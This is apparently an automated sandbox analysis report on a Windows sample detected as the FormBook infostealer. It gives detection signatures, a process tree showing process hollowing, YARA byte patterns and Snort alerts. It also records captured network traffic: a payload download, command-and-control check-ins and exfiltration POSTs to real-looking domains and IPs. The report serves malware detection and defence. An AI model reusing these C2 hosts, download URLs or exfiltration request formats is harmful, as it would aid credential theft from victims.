Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SC_0017384.exe

Overview

General Information

Sample Name:SC_0017384.exe
Analysis ID:831200
MD5:f296a60e1568722b060de70b46357fe6
SHA1:e24c65bd02d435c6b5705e9a01442e0447b77e22
SHA256:661f40c3448fa2acbddfd8297c54733b9f2d9c71e15506a4fba876a25d279e76
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Encrypted powershell cmdline option found
Machine Learning detection for sample
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • SC_0017384.exe (PID: 5876 cmdline: C:\Users\user\Desktop\SC_0017384.exe MD5: F296A60E1568722B060DE70B46357FE6)
    • powershell.exe (PID: 5040 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • SC_0017384.exe (PID: 5956 cmdline: C:\Users\user\Desktop\SC_0017384.exe MD5: F296A60E1568722B060DE70B46357FE6)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Lvdnyvcvr.exe (PID: 6136 cmdline: "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe" MD5: F296A60E1568722B060DE70B46357FE6)
          • powershell.exe (PID: 4504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • Lvdnyvcvr.exe (PID: 1980 cmdline: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe MD5: F296A60E1568722B060DE70B46357FE6)
        • systray.exe (PID: 5568 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
        • Lvdnyvcvr.exe (PID: 1436 cmdline: "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe" MD5: F296A60E1568722B060DE70B46357FE6)
          • powershell.exe (PID: 6116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
            • conhost.exe (PID: 572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • Lvdnyvcvr.exe (PID: 5300 cmdline: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe MD5: F296A60E1568722B060DE70B46357FE6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f060:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x18267:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x18065:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b01:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x18167:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x182df:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa9ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16d5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de07:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f060:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18267:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 11 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.SC_0017384.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.SC_0017384.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20de3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xcba2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x19fea:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.SC_0017384.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19de8:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x19884:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x19eea:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1a062:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xc76d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18adf:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1fb8a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20b3d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.SC_0017384.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.SC_0017384.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x1ffe3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xbda2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x191ea:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 3 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.5172.67.194.22549710802031453 03/21/23-09:12:13.411086
          SID:2031453
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.574.208.236.13149702802031449 03/21/23-09:11:27.575244
          SID:2031449
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.574.208.236.13149702802031412 03/21/23-09:11:27.575244
          SID:2031412
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.574.208.236.13149702802031453 03/21/23-09:11:27.575244
          SID:2031453
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5172.67.194.22549710802031449 03/21/23-09:12:13.411086
          SID:2031449
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5172.67.194.22549710802031412 03/21/23-09:12:13.411086
          SID:2031412
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: SC_0017384.exeReversingLabs: Detection: 12%
          Source: SC_0017384.exeVirustotal: Detection: 17%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeReversingLabs: Detection: 12%
          Machine Learning detection for sample
          Source: SC_0017384.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeJoe Sandbox ML: detected
          Source: 3.2.SC_0017384.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: SC_0017384.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49698 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49701 version: TLS 1.2
          Source: SC_0017384.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SC_0017384.exe, SC_0017384.exe, 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.381474937.000000000140D000.00000004.00000020.00020000.00000000.sdmp, SC_0017384.exe, 00000003.00000003.383573088.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000051DF000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.578982568.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.433202218.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000003.430554668.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, Lvdnyvcvr.exe, 0000000E.00000002.548095343.0000000001520000.00000040.00001000.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000010.00000002.567296609.00000000013B0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 54.85.86.211 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.myprojoints.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.152.24 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.131 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.229 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.metatv.app
          Source: C:\Windows\explorer.exeDomain query: www.findmyoriginstory.com
          Source: C:\Windows\explorer.exeDomain query: www.brunaeleandro.com
          Source: C:\Windows\explorer.exeDomain query: www.madisoncountylincoln.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.194.225 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.emprendizajesocial.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 74.208.236.131:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 74.208.236.131:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 74.208.236.131:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 172.67.194.225:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 172.67.194.225:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 172.67.194.225:80
          Yara detected Generic Downloader
          Source: Yara matchFile source: 0.2.SC_0017384.exe.6980000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SC_0017384.exe.486b570.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: global trafficHTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw== HTTP/1.1Host: www.findmyoriginstory.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g== HTTP/1.1Host: www.emprendizajesocial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG45 HTTP/1.1Host: www.brunaeleandro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA== HTTP/1.1Host: www.madisoncountylincoln.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG45 HTTP/1.1Host: www.metatv.appConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 54.85.86.211 54.85.86.211
          Source: global trafficHTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.emprendizajesocial.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.emprendizajesocial.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.emprendizajesocial.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 74 53 67 53 46 6d 4e 55 59 35 38 65 4d 74 73 57 28 58 79 41 56 6c 64 6e 39 42 43 72 31 71 54 51 4f 42 64 6a 6d 49 44 54 4d 68 32 50 45 5a 4c 71 36 69 4d 32 64 4a 77 4c 36 38 32 47 5a 43 64 78 48 68 48 46 55 56 5a 5a 58 4e 70 61 59 45 52 61 28 74 4a 48 54 42 48 4e 59 5a 4b 68 56 73 68 45 79 6f 4d 30 5a 48 4a 59 56 54 6e 61 46 7a 4f 55 38 65 57 49 46 48 4a 63 6b 32 41 63 71 31 6e 62 6f 6c 33 44 77 6a 56 36 50 5a 46 42 33 5a 69 37 34 42 42 65 68 63 6e 44 7e 4b 41 56 6f 69 37 75 55 48 48 44 47 6d 62 76 41 4c 63 4a 36 45 64 55 4a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=tSgSFmNUY58eMtsW(XyAVldn9BCr1qTQOBdjmIDTMh2PEZLq6iM2dJwL682GZCdxHhHFUVZZXNpaYERa(tJHTBHNYZKhVshEyoM0ZHJYVTnaFzOU8eWIFHJck2Acq1nbol3DwjV6PZFB3Zi74BBehcnD~KAVoi7uUHHDGmbvALcJ6EdUJQ).
          Source: global trafficHTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.brunaeleandro.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.brunaeleandro.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brunaeleandro.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 65 50 49 69 41 6e 77 2d 54 66 4f 72 6f 48 65 71 66 5f 35 72 68 4b 6c 74 30 78 4b 32 4c 4d 79 66 4f 56 4e 53 32 75 66 5a 77 73 78 37 43 32 42 35 49 76 34 33 57 6f 6d 51 58 76 7e 58 67 71 37 4a 70 4d 49 68 52 79 53 6e 36 36 36 67 66 51 54 47 4f 38 6e 6b 33 68 39 4b 30 30 58 59 44 5f 42 34 68 36 4e 38 4f 6f 6a 5a 4c 4f 35 69 53 36 63 51 48 36 74 6c 4b 63 77 74 59 46 78 55 56 61 51 75 69 51 46 6e 59 48 69 75 65 6d 55 63 72 53 4d 37 47 51 6b 6a 30 50 46 70 6c 39 36 47 6f 52 45 7a 35 33 39 39 4e 38 58 70 6e 43 54 63 66 74 6d 51 73 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=ePIiAnw-TfOroHeqf_5rhKlt0xK2LMyfOVNS2ufZwsx7C2B5Iv43WomQXv~Xgq7JpMIhRySn666gfQTGO8nk3h9K00XYD_B4h6N8OojZLO5iS6cQH6tlKcwtYFxUVaQuiQFnYHiuemUcrSM7GQkj0PFpl96GoREz5399N8XpnCTcftmQsw).
          Source: global trafficHTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.madisoncountylincoln.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.madisoncountylincoln.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.madisoncountylincoln.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 57 35 41 4e 77 46 37 41 6f 31 54 79 6c 39 48 44 32 33 6e 46 6f 72 65 6d 49 65 45 44 6d 4b 74 4b 49 6e 49 49 31 5a 5a 67 41 30 4a 48 52 41 69 31 4f 6d 58 56 35 31 7a 52 32 68 76 4b 33 6a 38 71 68 44 63 6f 72 45 6d 4e 78 52 67 32 44 36 6d 4b 58 75 33 48 5a 56 51 57 47 33 32 71 58 63 4a 6b 78 4d 69 49 31 57 65 37 33 41 75 6f 75 73 6d 4d 71 46 6c 57 6a 75 75 48 49 4d 56 68 64 6e 64 67 6e 48 4d 78 47 5f 56 47 57 48 6b 69 7a 4b 34 5a 34 62 42 7a 52 37 7a 52 61 75 6e 30 48 33 54 44 76 43 6c 52 7e 57 38 30 37 57 59 68 46 63 44 73 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=W5ANwF7Ao1Tyl9HD23nForemIeEDmKtKInII1ZZgA0JHRAi1OmXV51zR2hvK3j8qhDcorEmNxRg2D6mKXu3HZVQWG32qXcJkxMiI1We73AuousmMqFlWjuuHIMVhdndgnHMxG_VGWHkizK4Z4bBzR7zRaun0H3TDvClR~W807WYhFcDsng).
          Source: global trafficHTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.metatv.appConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.metatv.appUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.metatv.app/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 28 50 51 4d 33 59 50 4d 61 32 7a 2d 50 59 50 33 34 70 4a 4b 37 70 6e 6c 7a 78 6a 79 6f 72 31 46 7a 36 62 64 51 56 58 45 28 6d 58 48 74 57 39 6b 52 4c 41 55 6e 46 76 4e 5a 77 38 63 55 4a 34 45 30 73 52 7a 72 4a 4e 62 58 39 5a 4b 51 48 44 7a 5a 54 77 72 79 57 49 55 70 58 42 64 50 32 31 55 44 35 68 62 53 63 68 7a 28 55 49 77 77 70 6e 73 4f 4d 76 7a 36 6b 67 67 63 59 6e 6e 4b 33 35 31 6f 53 54 54 53 6e 44 58 48 56 63 4f 51 56 43 4a 39 39 69 75 58 65 6e 30 6a 48 43 59 65 59 69 68 49 47 6f 41 79 64 48 71 38 57 4b 33 53 4f 38 36 74 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=(PQM3YPMa2z-PYP34pJK7pnlzxjyor1Fz6bdQVXE(mXHtW9kRLAUnFvNZw8cUJ4E0sRzrJNbX9ZKQHDzZTwryWIUpXBdP21UD5hbSchz(UIwwpnsOMvz6kggcYnnK351oSTTSnDXHVcOQVCJ99iuXen0jHCYeYihIGoAydHq8WK3SO86tQ).
          Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Tue, 21 Mar 2023 08:11:27 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 